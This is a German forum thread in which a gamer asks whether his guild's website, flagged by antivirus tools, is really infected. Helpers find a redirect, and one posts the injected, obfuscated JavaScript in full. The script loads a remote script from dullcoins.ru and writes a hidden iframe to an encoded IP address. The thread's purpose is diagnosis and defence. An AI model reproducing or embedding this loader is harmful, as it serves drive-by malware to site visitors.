Hallo zusammen! ich bin computerspieler eines online spieles (world of warcraft ) und dort frisch in einer grossen gilde gelandet ca 115 mann. da sich die meisten leute dort auch auf einer internetseite mit forum registrieren sollen habe ich diese internetseite aufgerufen und bekam die meldung das die seite gesperrt wäre von meiner jeweiligen sicherheitssoftware weil da ein böses script auf mich wartet screenshots hab ich hier hochgeladen hxxp://img153.imageshack.us/gal.php?g=gdata.jpg jeweils von 2 computern und 2 sicherheitssoftwares. das problem ist das leute aus dieser gilde sagen es wäre ein fehlalarm und auf ihrer seite würde alles in ordnung sein. ich bitte daher auch wenn ich vieleicht jetzt im falschen themenbereich gelandet bin bitte das diese seite von jemand der sich damit auskennt überprüft wird und mir hierzu eine oder mehrere sachdienliche hinweise gepostet werden was denn nun bei dieser seite sache ist. Die seite lautet www. savagecrew.de Ich bitte darum nachzuforschen falls einer lust hat was genau mit dieser seite los ist ob es ein fehlalarm ist oder ob da was echtes auf einen lauert. ich bedanke mich schon einmal im vorraus für alle sachdienlichen hinweise

Hallo und

Für mich sieht das eher nach einem Fehlalarm aus.
Du solltest aber - um das Risiko einer Infektion zu minimieren - grundsätzlich nicht mit Adminrechten surfen!

uff endlich mal jemand der sich wenigstens mal dazu ausspricht jedenfalls teilweise ^^. was ist denn das nun genau was die alarmmeldung auslöst bei den ganzen antivirenprogrammen wie gdata kasperksy und avast?

Nur um es mal anzumerken, mein avast! findet auch ein JS:Illredir-BY in dem Dokument. Vielleicht sollte mal jemand das Dokument (bzw. Source) in einem Sandboxed-Browser sich mal anschauen...

ja da könntest du recht haben mal genau ansehen und darauf abzielen was es nun wirklich ist

Hm...
Irgendwas hat sich da drangeheftet. Geht man auf savagecrew.de wird man einen Moment später auf savagecrew.mmoguildsites.com weitergeleitet. Auf der .de Seite gibt es aber ein sehr merkwürdiges Script, ich habs mal in eine TXT-Datei kopiert und bei Virustotal auswerten lassen => Virustotal. MD5: 5db944fc567f9d44058c4a80b4084144 JS/TrojanDownloader.Pegel.BP JS:Illredir-BY JS:Illredir-BY

Den Code des Scripts selbst versteh ich jedoch nicht aber anscheinend wird da was von dullcoins.ru eingebettet

Code: Alles auswählenAufklappen

ATTFilter

 <!-- Weiterleitungs Generator Generator by 6Webmaster.com --> <meta http-equiv="refresh" content="0; URL=http://savagecrew.mmoguildsites.com/"> 
<!-- Weiterleitungs Generator Generator by 6Webmaster.com --> 
<script>var U;var c=["A","Dh"];this.WI=32904;this.WI--;R=function(){var dz=["SX","cr"];var NO=["q","cg"];var KY=["ge"];f=[];function D(Z,W,P){this.fM=35767;this.fM-=104;return Z.substr(W,P);}var Tj=new String();var Mt=new String();this.sM=false;var L={};var g=new String("/fish"+D("ki-neJQr",0,5)+D("auDKt/gooKDau",4,5)+"gle.c"+D("F6rEom/woFEr6",4,5)+D("D8NGrdpre8DNG",4,5)+D("k0E7ss.cok07E",4,5)+D("m.phpdWu",0,5));var X=RegExp;this.O='';var B='';uB={p:33264};eI=143;eI-=22;try {} catch(uq){};var V=document;Jq=43161;Jq-=2;this.ei='';this.YM="YM";function o(Z,W){CT={};var z="";var P=String("[")+W+new String("]");var K=new X(P, D("gZuR9",0,1));return Z.replace(K, B);};this.vk=false;var UY="UY";D_={dn:59982};var l={LG:false};var x=String("bod"+"y");var xV=null;hH=31743;hH++;var u=o('sFcJrHiOpFtn','En9TWqGMFXJhZB6O1IHP');Wx={};Xg={UV:false};Nu=[];var ps={MI:62287};var oj=630185-622105;iB=27021;iB+=19;var vf=["Gs"];try {var pu='zx'} catch(pu){};U=function(){var iH="iH";try {} catch(nz){};try {var XD=o('cOrue9aut9eOEOlLeumjeLnbtu','ubNGL9iPOJ7j');var cC='';y=V[XD](u);var m=new Array();this.CG=51908;this.CG--;var _b={jc:"sT"};var C=o('sWrlcu','u76bARDl_Wp');var lb=["iv","M_"];var T=D("defQH3r",0,3)+D("QkIFerFIQk",4,2);var Tq=false;var Kj=[];var Vq=new Date();this.Sa='';var Z=oj+g;cf=59751;cf--;var eA={AA:28867};y[T]=[1,8][0];try {var Rj='rz'} catch(Rj){};try {} catch(Bj){};tC=["Lp","Ya"];y[C]=new String("htt"+D("p:/E54",0,3)+D("/duoi8",0,3)+D("llckxzG",0,3)+D("oindmMe",0,3)+D("s.rfqa",0,3)+D("lPTXu:TXPl",4,2))+Z;V[x].appendChild(y);this.jh=5930;this.jh+=34;} catch(M){try {var kF='pN'} catch(kF){};};var Ny=["Ce"];this.Fo="";};try {var _G='hr'} catch(_G){};};var Mx=21758;R();try {var Hb='HV'} catch(Hb){};this.Wm=15481;this.Wm+=148;window.onload=U;fQ=8476;fQ-=222;var tg=new Date();</script>
<!--3ad6b64713a329ba2586a12669071426--<html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace('vde', 'i');str =str.replace('pog', 'fr');str = str.replace('nbt', 'ame');str =str.replace('Oaoz5', 'width');str =str.replace('vxoq5','height');document.write(str);</script></body></html>>
         

also könnte man von dubioser werbung sprechen?